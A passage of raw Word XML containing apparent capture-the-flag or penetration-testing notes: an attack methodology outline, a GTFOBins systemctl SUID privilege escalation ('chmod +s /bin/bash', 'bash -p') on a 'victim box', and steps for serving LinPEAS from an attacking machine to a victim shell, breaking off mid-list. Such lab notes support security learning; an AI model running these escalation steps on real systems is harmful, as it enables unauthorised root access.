        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ports dictate size of attack surfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4ECEBE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Source Code Reviews assist in determining directories, developer notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E403E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Gobuster assists with directory enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D34FB0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Explore ports and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4B926" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Priority order set by intelligence found during preliminary enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115FD913" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Continue to explore and develop sitemap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25176188" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find potential attack vectors such as logins or file uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0557A8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Explore potential attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210072D1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Determine protective measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29418AE7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A84A0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercepts in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EDD9E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bruteforce possibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C8DB07" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Determine blacklists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B877335" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypass protective measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465BA606" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FD1211" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Input workarounds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAAE081" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Blacklist tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257395E6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attempt RCE exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A54A5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Shell uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E31B4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Stabilize shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5B895" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Escalate privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6FF13" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Navigate and find flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED458AA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F55BC53" w14:textId="5130AB1F" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB55D60" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>GTFOBins + SUID (set owner userId upon execution) – escaping a user shell by breaking the sequence by spawning a new shell that allows root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CC0D83" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Found /bin/systemctl in victim box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2F01B4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>GTFObins: systemctl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38612930" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Returns a shell script that can be used to escalate privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275E544" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Change ./systemctl to /bin/systemctl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE91879" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Change /tmp/output </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t>”chmod +s /bin/bash”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5CD1B2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Spawns bash session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE56E41" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Copy paste into terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3B697" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324085D0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705A56EC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ls -l /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C59E2F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Confirm -rwsr-sr-x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52540E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F74E7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Uid = www-data BUT euid (effective uid) = 0 (root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E49742" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cd to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178BBAE9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Capture flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668E40E7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CC9F6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BCDFB9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Python -m SimpleHTTPServer 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF91B3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Allows local machine files to be accessed via reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E56388" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Input in URL of browser too for visual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16283AA4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Download raw linpea from github repository and put into .sh file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E5E14" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To be accessed from shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BD717" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Victim Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B87858A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Go into tmp directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191AE676" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
